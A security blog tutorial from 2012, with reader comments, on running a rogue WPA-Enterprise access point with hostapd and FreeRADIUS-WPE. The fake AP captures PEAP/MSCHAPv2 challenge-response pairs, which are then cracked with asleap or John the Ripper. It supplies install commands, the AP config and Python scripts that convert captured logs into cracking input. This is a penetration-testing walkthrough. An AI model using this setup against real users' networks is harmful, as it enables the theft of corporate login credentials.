Tuesday, April 10, 2012

Capturing and cracking a PEAP challenge/response with FreeRADIUS-WPE

By Robert Portvliet.

I figured I would put together a quick post on configuring and using FreeRADIUS-WPE, as lately I've seen a few people have trouble getting it going on Backtrack 5 R2. To perform a successful attack we need two things: the updated FreeRADIUS-WPE package Brad Antoniewicz put together a few months back, and hostapd for our malicious AP. We also need to write a .conf file for hostapd to run from.

After booting into Backtrack, go to http://blog.opensecurityresearch.com/2011/09/freeradius-wpe-updated.html and download freeradius-server-wpe_2.1.11-1_i386.deb (it is a 32-bit package, so use it on a 32-bit Backtrack install).

To install, type:
dpkg --install freeradius-server-wpe_2.1.11-1_i386.deb
Then:
ldconfig
Next install hostapd:
apt-get install hostapd

Run the FreeRADIUS-WPE setup from the Backtrack menu, which runs the following:

sh -c "cd /pentest/libs/freeradius-wpe/raddb/certs && ./bootstrap && cp -r * /usr/local/etc/raddb/certs;sudo -s"

bootstrap generates a self-signed CA plus a server certificate signed by it and copies them into the live raddb certs directory; that server certificate is what clients are shown during the PEAP TLS handshake.

The output should finish up looking something like this:


Then, we test that FreeRADIUS is working by:

radiusd -X 

("-X" turns on full debugging and keeps radiusd in the foreground, so leave it running in its own terminal). It will scroll the parsed configuration up the screen and should end with "Ready to process requests.":


Next, we need a configuration file for hostapd to run from. Here is one Brad Antoniewicz put together a while ago, with one line added: wpa_key_mgmt=WPA-EAP. Without it hostapd assumes WPA-PSK and refuses to start with "WPA-PSK enabled, but PSK or passphrase is not configured." Two more things to watch: hostapd does not strip quotes from the ssid value (a quoted name is beaconed with the quotes), so the name is written bare, and auth_server_shared_secret has to match the secret for 127.0.0.1 in FreeRADIUS's clients.conf (testing123 in the stock config). wpa=1 advertises WPA version 1 only; if your test client's profile is locked to WPA2-Enterprise, use wpa=2 (or wpa=3 for both).

interface=wlan0
driver=nl80211
ssid=corporateWIFI
logger_stdout=-1
logger_stdout_level=0
dump_file=/tmp/hostapd.dump
ieee8021x=1
eapol_key_index_workaround=0
own_ip_addr=127.0.0.1
auth_server_addr=127.0.0.1
auth_server_port=1812
auth_server_shared_secret=testing123
wpa=1
wpa_key_mgmt=WPA-EAP
channel=1
wpa_pairwise=TKIP CCMP

hostapd puts the card into AP (master) mode itself through the nl80211 driver, so point it at the plain wlan0 interface (or in my case wlan1). You do not need a monitor-mode interface from airmon-ng, and pointing hostapd at mon0 fails with "Could not set interface mon0 flags". Before starting it, make sure the interface is up and that nothing else (NetworkManager, wpa_supplicant) is managing it, and check that the driver supports AP mode at all: iw list prints the supported interface modes, and "AP" has to be among them, otherwise hostapd stops with "Failed to set interface wlan0 into AP mode".


Next start hostapd, passing the path to the configuration file as its only argument:


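As an added check (example code written for this post, not part of the original post, hostapd or FreeRADIUS-WPE), the following Python lints a hostapd config of the shape above before you start hostapd. It flags the problems readers have hit with this setup: a monitor-mode interface= (hostapd drives the base wlanN device itself), a quoted ssid= (hostapd keeps the quotes), wpa= with ieee8021x=1 but no wpa_key_mgmt=WPA-EAP (hostapd then defaults to WPA-PSK and refuses to start), wpa=1 (WPA version 1 only), and a shared secret that does not match the FreeRADIUS clients.conf entry for 127.0.0.1. The two configs embedded in it are constructed for the example; the radius_secret default of testing123 is an assumption matching the stock clients.conf.

```python
#!/usr/bin/env python3
"""Added example, not code from the original post, hostapd or FreeRADIUS-WPE:
a lint pass over a hostapd 802.1X config before hostapd is started.
BROKEN_CONF and FIXED_CONF are constructed for the example."""

import re

# Broken on purpose: monitor interface, quoted SSID, no wpa_key_mgmt, WPA1 only.
BROKEN_CONF = """\
interface=mon0
driver=nl80211
ssid="corporateWIFI"
ieee8021x=1
own_ip_addr=127.0.0.1
auth_server_addr=127.0.0.1
auth_server_port=1812
auth_server_shared_secret=testing123
wpa=1
channel=1
wpa_pairwise=TKIP CCMP
"""

# Same config with the problems corrected (wpa=3 advertises WPA and WPA2).
FIXED_CONF = """\
interface=wlan0
driver=nl80211
ssid=corporateWIFI
ieee8021x=1
own_ip_addr=127.0.0.1
auth_server_addr=127.0.0.1
auth_server_port=1812
auth_server_shared_secret=testing123
wpa=3
wpa_key_mgmt=WPA-EAP
channel=1
wpa_pairwise=TKIP CCMP
"""


def parse_hostapd_conf(text):
    """Return a dict of key -> value. Blank lines and # comments are ignored;
    like hostapd, the last occurrence of a repeated key wins."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if not sep:
            raise ValueError("malformed line: %r" % raw)
        conf[key.strip()] = value.strip()
    return conf


def lint_hostapd_conf(text, radius_secret="testing123"):
    """Return a list of human-readable problems; an empty list means the
    config passes every check this linter knows about. radius_secret is the
    secret FreeRADIUS expects for 127.0.0.1 (assumed: the stock testing123)."""
    conf = parse_hostapd_conf(text)
    problems = []
    iface = conf.get("interface", "")
    if re.fullmatch(r"mon\d+", iface):
        problems.append("interface=%s is a monitor-mode interface; hostapd needs "
                        "the base wlanN device and puts it in AP mode itself" % iface)
    ssid = conf.get("ssid", "")
    if len(ssid) >= 2 and ssid[0] == ssid[-1] and ssid[0] in "\"'":
        problems.append("ssid=%s: hostapd keeps the quotes, so the beacon would "
                        "carry them literally" % ssid)
    wpa = conf.get("wpa", "0")
    if conf.get("ieee8021x") == "1" and wpa != "0":
        if "WPA-EAP" not in conf.get("wpa_key_mgmt", "").split():
            problems.append("wpa=%s with ieee8021x=1 but no wpa_key_mgmt=WPA-EAP; "
                            "hostapd defaults to WPA-PSK and aborts with 'WPA-PSK "
                            "enabled, but PSK or passphrase is not configured'" % wpa)
    if wpa == "1":
        problems.append("wpa=1 advertises WPA version 1 only; clients locked to "
                        "WPA2-Enterprise will not associate, use wpa=2 or wpa=3")
    if conf.get("ieee8021x") == "1" and conf.get("auth_server_shared_secret") != radius_secret:
        problems.append("auth_server_shared_secret does not match the FreeRADIUS "
                        "clients.conf secret for 127.0.0.1 (%s)" % radius_secret)
    return problems


if __name__ == "__main__":
    for name, text in (("broken", BROKEN_CONF), ("fixed", FIXED_CONF)):
        print("%s:" % name)
        for problem in lint_hostapd_conf(text) or ["no problems found"]:
            print("  - " + problem)
```

Run it as a script to see both verdicts, or import lint_hostapd_conf and feed it the contents of your own file before invoking hostapd.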
Now that we have hostapd and FreeRADIUS-WPE running, connect to the corporateWIFI SSID with your test client and enter your credentials. Keep in mind that the PEAP tunnel is built on the self-signed server certificate bootstrap generated, so a client that validates the RADIUS server certificate (and whose user does not click through the warning) never sends the inner MS-CHAPv2 exchange; the attack relies on clients that skip that validation. You should see activity in your hostapd window at this point, which will look something like this:


Your client will report that the login failed, since WPE records the exchange but never accepts the credentials. If all goes well, when you tail the FreeRADIUS-WPE log at /usr/local/var/log/radius/freeradius-server-wpe.log you'll see the username, challenge and response:


Finally, we can use asleap to attempt to crack the challenge/response: pass the challenge and response straight from the log (colon-separated hex) with -C and -R, and a wordlist with -W.


Obviously, you are limited strictly to the words in your wordlist when using asleap, but if you want you can feed the challenge/response to John and use its mangling capabilities. Josh Kelley wrote a neat Python script called radiusWPE2john.py, which I happened upon on pastebin (http://pastebin.com/RJwgbwNh), that takes the FreeRADIUS-WPE log output and converts the challenge/response into a format John understands. Here's a copy of it:

#!/usr/bin/python

############################################################################### 
# Free Radius WPE log file convertor to John The Ripper formatted file for 
# password cracking.  Use the following format for John:
# ./john --format=NETNTLM freeradius.john
#
# 12/19/2011 - Josh Kelley
###############################################################################

from __future__ import print_function
import sys

if len(sys.argv) < 2:
    print("Please feed me the path to the Free Radius WPE log file")
    sys.exit(1)

fileIn = open(sys.argv[1], 'r')
fileOut = open('freeradius.john', 'w')

# Each capture in the log is four lines: "mschap: <date>" followed by the
# username, challenge and response fields, the hex bytes colon-separated.
# i counts the lines of the current record; at 4 a complete record is written.
i = 0
for line in fileIn:
    lineClean = line.strip()
    lineSplit = lineClean.split(':')
    if lineSplit[0] == "mschap":
        i = i + 1
    if lineSplit[0] == "username":
        # keep everything after the first colon in case the name contains one
        username = ':'.join(lineSplit[1:]).strip()
        i = i + 1
    if lineSplit[0] == "challenge":
        # drop the colons between the hex bytes: 8 bytes -> 16 hex chars
        challenge = ''.join(lineSplit[1:]).strip()
        i = i + 1
    if lineSplit[0] == "response":
        # 24-byte NT-Response -> 48 hex chars
        response = ''.join(lineSplit[1:]).strip()
        i = i + 1
    if i == 4:
        lineNew = "%s:$NETNTLM$%s$%s" % (username, challenge, response)
        fileOut.write("%s\n" % lineNew)
        i = 0
fileIn.close()
fileOut.close()

Run radiusWPE2john.py and point it at the FreeRADIUS-WPE log. It writes a freeradius.john file in the current directory with each challenge/response converted to the proper formatting for John.


Then, simply feed John the freeradius.john file. The comments in radiusWPE2john.py give the example of using --format=NETNTLM, but John didn't find the hashes for me when given it; it does find them with no format argument (YMMV). The NETNTLM format only exists in the jumbo builds of John, and in those the $NETNTLM$ tag on each line is enough for John to detect the format on its own.


Of course, you can also just pipe the output of John into asleap: run John with --wordlist, --rules and --stdout so it writes the mangled candidates to standard output instead of cracking, and make sure to put a dash after asleap's -W switch so it reads the wordlist from stdin. That makes the magic happen. Incidentally, you can do the same thing with coWPAtty and aircrack-ng: in both cases a dash in place of the wordlist file (-w for aircrack-ng, -f for coWPAtty) lets you take stdout from John to perform wordlist mangling.
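Where the logged challenge comes from, and a converter that covers the whole log, as an added example written for this post (not Josh Kelley's script and not FreeRADIUS-WPE code). The SAMPLE_LOG below is constructed in the log's layout with made-up names and hex values; the only real data are the RFC 2759 section 9.2 test vectors used to check challenge_hash. The code parses every complete capture, emits the john line and the matching asleap command for each, drops a truncated trailing record instead of merging it into the next one, and computes the RFC 2759 ChallengeHash that is the 8-byte "challenge" WPE logs. That last function is the explanation for the DOMAIN\user problem: Windows clients hash over the bare user name even when they send DOMAIN\user, so unless the WPE side strips the domain too (with_ntdomain_hack = yes in raddb/modules/mschap) the logged challenge is not the one the response was computed against, and no wordlist will ever match it.

```python
#!/usr/bin/env python3
"""Added example, not code from the original post, Josh Kelley's script or
FreeRADIUS-WPE: parse a WPE log into john/asleap input and show where the
logged 8-byte challenge comes from (RFC 2759 ChallengeHash)."""

import hashlib
import re

# Constructed sample in the WPE log layout: two complete captures and one
# truncated record at the end. Names and hex values are made up.
SAMPLE_LOG = """\
mschap: Tue Apr 10 14:02:11 2012
\tusername: testuser
\tchallenge: 5a:11:4f:9c:e3:07:b2:6d
\tresponse: 3c:8e:a1:00:77:d4:2b:f6:19:c5:e8:02:4d:b7:60:9a:ff:13:5e:c2:8b:70:d9:46
mschap: Tue Apr 10 14:05:47 2012
\tusername: CORP\\jdoe
\tchallenge: 11:22:33:44:55:66:77:88
\tresponse: 00:11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff:01:23:45:67:89:ab:cd:ef
mschap: Tue Apr 10 14:06:02 2012
\tusername: cutoff
"""

FIELD_RE = re.compile(r"^\s*(username|challenge|response):\s*(.*?)\s*$")


def parse_wpe_log(text):
    """Return a list of {username, challenge, response} dicts, one per complete
    capture. 'mschap: <date>' opens a record; it is kept only once all three
    fields were seen, so a truncated tail is dropped, not merged into the next."""
    records, current = [], None
    for line in text.splitlines():
        if line.startswith("mschap:"):
            current = {}
            continue
        m = FIELD_RE.match(line)
        if current is None or m is None:
            continue
        current[m.group(1)] = m.group(2)
        if len(current) == 3:
            records.append(current)
            current = None
    return records


def strip_nt_domain(username):
    """'CORP\\jdoe' -> 'jdoe': the name Windows actually hashes the challenge over."""
    return username.rsplit("\\", 1)[-1]


def colon_hex_to_bytes(value):
    return bytes.fromhex(value.replace(":", ""))


def to_john(record):
    """john (jumbo) netntlm line: user:$NETNTLM$<8-byte challenge>$<24-byte NT-Response>.
    The user field is only a label; the two hex fields are what gets cracked."""
    challenge = colon_hex_to_bytes(record["challenge"])
    response = colon_hex_to_bytes(record["response"])
    if len(challenge) != 8 or len(response) != 24:
        raise ValueError("unexpected field length for %s" % record["username"])
    return "%s:$NETNTLM$%s$%s" % (strip_nt_domain(record["username"]),
                                  challenge.hex(), response.hex())


def to_asleap(record, wordlist="words.txt"):
    """asleap takes the challenge and response exactly as WPE logs them."""
    return ["asleap", "-C", record["challenge"], "-R", record["response"], "-W", wordlist]


def challenge_hash(peer_challenge, auth_challenge, username):
    """RFC 2759 section 8.2 ChallengeHash: first 8 bytes of
    SHA-1(PeerChallenge || AuthenticatorChallenge || UserName). This is the
    value FreeRADIUS-WPE writes as 'challenge'; if the server hashes over
    'DOMAIN\\user' while the client hashed over 'user', the logged pair is
    inconsistent and cannot be cracked."""
    h = hashlib.sha1()
    h.update(peer_challenge)
    h.update(auth_challenge)
    h.update(username.encode("utf-8"))
    return h.digest()[:8]


# Test vectors from RFC 2759 section 9.2 (UserName "User").
RFC_PEER_CHALLENGE = bytes.fromhex("21402324255E262A28295F2B3A337C7E")
RFC_AUTH_CHALLENGE = bytes.fromhex("5B5D7C7D7B3F2F3E3C2C602132262628")
RFC_CHALLENGE = bytes.fromhex("D02E4386BCE91226")


if __name__ == "__main__":
    for rec in parse_wpe_log(SAMPLE_LOG):
        print(to_john(rec))
        print(" ".join(to_asleap(rec)))
        if "\\" in rec["username"]:
            print("  note: domain-prefixed name, WPE needs with_ntdomain_hack = yes")
```

With a jumbo build of John the format is netntlm, so john --format=netntlm freeradius.john; for rules-based mangling pipe john --wordlist=words.txt --rules --stdout into asleap -C ... -R ... -W - using the values to_asleap prints.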


Enjoy!

10 comments:

  1. I'm having some issues cracking the Challenge/Response when the username includes a domain (e.g. DOMAIN\testuser , instead of just testuser).

    I've captured credentials for both 'DOMAIN\testuser' and 'testuser'. Both had the same password and the challenge/response pair was passed into John. The password for 'testuser' is identified almost instantly (in the wordlist), however the password for 'DOMAIN\testuser' isn't (despite being exactly the same).

    Any idea why? Any suggestions?

  2. Does this work the same way and have the same capabilities as using freeradius-wpe-2.1.7.patch and using an AP connecting to it? Are there any limitations other than the obvious of having a separate AP? The reason I ask is, I have not been able to patch my freeradius-server-2.1.7 and keep getting the error "freeradius-server-2.1.7/src/lib/.libs/libfreeradius-radius-2.1.7.so: could not read symbols: Invalid operation
    collect2: ld returned 1 exit status
    make[6]: *** [radeapclient] Error 1"

    So I would like an alternative option. This looks wonderful if it can accomplish the same results (capture credentials, PEAP, etc.) without the patch.

    Thanks

  3. I believe I have everything working correctly up to the point of running "sudo hostapd hostapd-wpe.conf". I get the following error:

    /pentest/wireless/freeradius-server-2.1.11$ sudo hostapd hostapd-wpe.conf
    Configuration file: hostapd-wpe.conf
    WPA-PSK enabled, but PSK or passphrase is not configured.
    1 errors found in configuration file 'hostapd-wpe.conf'

    Any suggestions?
    Thanks

  4. I would like to document a few modifications and troubleshooting issues that may help some with their installation process. Brad and Robert offered amazing assistance getting this up and running for me. Thanks again guys!

    My personal setup:
    OS: Ubuntu 12.04 (32bit)
    hostapd v0.7.3
    freeradius-server-2.1.11
    freeradius-wpe-2.1.11.patch

    Note: I ended up using the 'freeradius-server-2.1.11.tar.bz2', adding the patch and compiling

    Issue:

    collect2: ld returned 1 exit status
    make[6]: *** [radeapclient] Error 1
    make[6]: Leaving directory `/pentest/wireless/freeradius-server-2.1.7/src/modules/rlm_eap'
    make[5]: *** [common] Error 2
    make[5]: Leaving directory `/pentest/wireless/freeradius-server-2.1.7/src/modules'
    make[4]: *** [all] Error 2
    make[4]: Leaving directory `/pentest/wireless/freeradius-server-2.1.7/src/modules'

    Solution:

    The certs/random file is not present. Add this command and it should fix this error:

    'dd if=/dev/urandom of=./random count=10'


    During the hostapd configuration phase, if you experience the error(s):

    Issue:

    @/wireless/freeradius-server-2.1.11$ sudo hostapd hostapd-wpe.conf
    Configuration file: hostapd-wpe.conf
    WPA-PSK enabled, but PSK or passphrase is not configured.
    1 errors found in configuration file 'hostapd-wpe.conf'

    Solution:

    This error basically means you have the configuration set up for WPA-PSK, rather than WPA Enterprise.

    Add 'wpa_key_mgmt=WPA-EAP' to the hostapd-wpe.conf file


    Issue:

    @/wireless/freeradius-server-2.1.11$ sudo hostapd hostapd-wpe.conf
    Configuration file: hostapd-wpe.conf
    Could not set interface mon0 flags: Name not unique on network
    nl80211 driver initialization failed.
    ELOOP: remaining socket: sock=4 eloop_data=0x878c8f8 user_data=0x878cf08 handler=0x807c5e0
    ELOOP: remaining socket: sock=6 eloop_data=0x878ed10 user_data=(nil) handler=0x8086770

    Solution:

    In the hostapd-wpe.conf file, change 'interface=mon0' to 'interface=wlan0' (or whatever your card is set to)


    Issue:

    Configuration file: hostapd-wpe.conf
    nl80211: Failed to set interface wlan0 into AP mode
    nl80211 driver initialization failed.
    ELOOP: remaining socket: sock=4 eloop_data=0x87278f8 user_data=0x8727f08 handler=0x807c5e0
    ELOOP: remaining socket: sock=6 eloop_data=0x8729d10 user_data=(nil) handler=0x8086770

    Solution:

    Your wireless card may not support AP mode or you may need a different driver.

    'hostapd-wpe.conf' (should look similar to this)

    interface=wlan0
    driver=nl80211
    ssid="corporateWIFI"
    logger_stdout=-1
    logger_stdout_level=0
    dump_file=/tmp/hostapd.dump
    ieee8021x=1
    eapol_key_index_workaround=0
    own_ip_addr=127.0.0.1
    auth_server_addr=127.0.0.1
    auth_server_port=1812
    auth_server_shared_secret=testing123
    wpa=1
    wpa_key_mgmt=WPA-EAP
    channel=1
    wpa_pairwise=TKIP CCMP

  5. Thanks for the write up sparky! glad we could help!!

    -brad

  6. Anonymous, you have to modify the line "with_ntdomain_hack = no" to "with_ntdomain_hack = yes" in the mschap module (/raddb/modules/mschap)...

  7. I am trying this on BT5r3 running VMWare Fusion 5 with an Alfa AWUS036H card.

    But keep getting the error:

    root@bt:~# hostapd hostapd.conf
    Configuration file: hostapd.conf
    Failed to set interface wlan0 to master mode.
    nl80211 driver initialization failed.
    ELOOP: remaining socket: sock=5 eloop_data=0xb09420 user_data=(nil) handler=0x43d3a0

    airbase-ng works fine so if there was an issue with the card, wouldn't that fail too?

    Thx, R.

  8. Why would the interface need to be in mon mode with hostapd? As far as I know you configure the SSID, get a client to connect (overpower their current AP), then the challenge/response for mschap is going to go through wpe? If you can do the same thing with a physical access point using open-wrt that just points to wpe then where does mon mode come into play?

    Replies
    1. Sorry for the mistake - that was actually a typo (that I could have sworn we corrected). It should just need to be the standard wlan0 interface.

  9. Hi..

    I'm using the Backtrack r3 version (multi boot, not VM)
    and I have a problem with my awus036h..

    The commands I use are..

    1. ifconfig -a (check all interfaces.. in my case awus036h is wlan2)

    2. ifconfig wlan2 up
    SIOCSIFFLAGS : invalid argument

    This error message is making me crazy... T_T...
    How can I fix the 'SIOCSIFFLAGS : invalid argument' error message?

    Please help me..

    thank you
